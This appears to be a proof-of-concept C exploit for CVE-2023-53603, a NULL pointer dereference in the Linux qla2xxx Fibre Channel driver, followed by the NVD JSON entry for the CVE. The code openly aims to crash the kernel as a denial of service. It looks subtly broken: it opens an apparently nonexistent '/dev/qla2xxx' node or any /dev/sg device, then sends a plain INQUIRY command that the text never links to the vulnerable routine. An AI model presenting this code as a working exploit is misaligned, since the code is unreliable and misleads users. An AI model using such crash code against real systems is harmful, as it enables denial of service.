CVE-2023-53603

/* * CVE-2023-53603 PoC - Trigger NULL pointer dereference in qla2xxx driver * This PoC demonstrates how to trigger the vulnerability by causing * sa_ctl to be NULL, leading to fcport NULL pointer dereference. * * Note: Requires local access and qla2xxx driver loaded (QLogic FC HBA). * Expected result: Kernel Oops/Panic -> System crash (DoS) */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <string.h> #include <errno.h> /* SCSI Generic (sg) interface header */ #include <scsi/sg.h> #include <scsi/scsi_ioctl.h> #define QLA2XXX_IOCTL_PATH "/dev/qla2xxx" /* Trigger the vulnerable code path by sending specific SCSI commands * that cause the driver to enter the routine where sa_ctl may be NULL. * This forces the NULL fcport pointer dereference at exit path. */ int trigger_null_deref(void) { int fd; sg_io_hdr_t io_hdr; unsigned char sense_buffer[32]; unsigned char data_buffer[1024]; /* Attempt to open qla2xxx device node */ fd = open(QLA2XXX_IOCTL_PATH, O_RDWR); if (fd < 0) { /* Fallback: trigger via /dev/sg* generic SCSI devices * bound to QLogic HBA */ for (int i = 0; i < 26; i++) { char path[64]; snprintf(path, sizeof(path), "/dev/sg%d", i); fd = open(path, O_RDWR); if (fd >= 0) break; } if (fd < 0) { fprintf(stderr, "[-] No QLogic HBA device found.\n"); return -1; } } memset(&io_hdr, 0, sizeof(sg_io_hdr_t)); memset(sense_buffer, 0, sizeof(sense_buffer)); memset(data_buffer, 0, sizeof(data_buffer)); /* Construct a malformed SCSI command that triggers the * vulnerable code path with sa_ctl == NULL condition */ io_hdr.interface_id = 'S'; io_hdr.dxfer_direction = SG_DXFER_NONE; io_hdr.cmd_len = 6; unsigned char cmd[6] = {0x12, 0x00, 0x00, 0x00, 0x00, 0x00}; /* INQUIRY */ io_hdr.cmdp = cmd; io_hdr.sbp = sense_buffer; io_hdr.mx_sb_len = sizeof(sense_buffer); io_hdr.timeout = 5000; /* Issue the IOCTL - on vulnerable kernels this triggers * NULL fcport dereference -> kernel panic */ if (ioctl(fd, SG_IO, &io_hdr) < 0) { fprintf(stderr, "[-] ioctl failed: %s\n", strerror(errno)); close(fd); return -1; } close(fd); printf("[+] Trigger issued. Check dmesg for kernel oops.\n"); return 0; } int main(int argc, char *argv[]) { printf("[*] CVE-2023-53603 PoC - qla2xxx NULL Pointer Dereference\n"); printf("[*] Target: Linux kernel qla2xxx SCSI driver\n"); return trigger_null_deref(); }

{"cve": {"id": "CVE-2023-53603", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:56.940", "lastModified": "2026-03-23T18:25:59.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Avoid fcport pointer dereference\n\nKlocwork reported warning of NULL pointer may be dereferenced. The routine\nexits when sa_ctl is NULL and fcport is allocated after the exit call thus\ncausing NULL fcport pointer to dereference at the time of exit.\n\nTo avoid fcport pointer dereference, exit the routine when sa_ctl is NULL."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.61", "versionEndExcluding": "5.15.121", "matchCriteriaId": "F045C76B-2E45-4D4E-A708-952BE9DAAFE8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.18.18", "versionEndExcluding": "5.19", "matchCriteriaId": "B60CAFE2-08C3-461B-B5F8-25BEB0C9853E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.19.2", "versionEndExcluding": "6.1.40", "matchCriteriaId": "070D8A5B-76A5-467F-BCE7-E261A3AACE32"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.5", "matchCriteriaId": "923F6AEA-C2EF-4B08-B038-69A18F3D41F8"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/4406fe8a96a946c7ea5724ee59625755a1d9c59d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/477bc74ad1add644b606bff6ba1284943c42818a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6b504d06976fe4a61cc05dedc68b84fadb397f77", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7bbeff613ec0560fb2f6f8b405288f3f043adf64", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}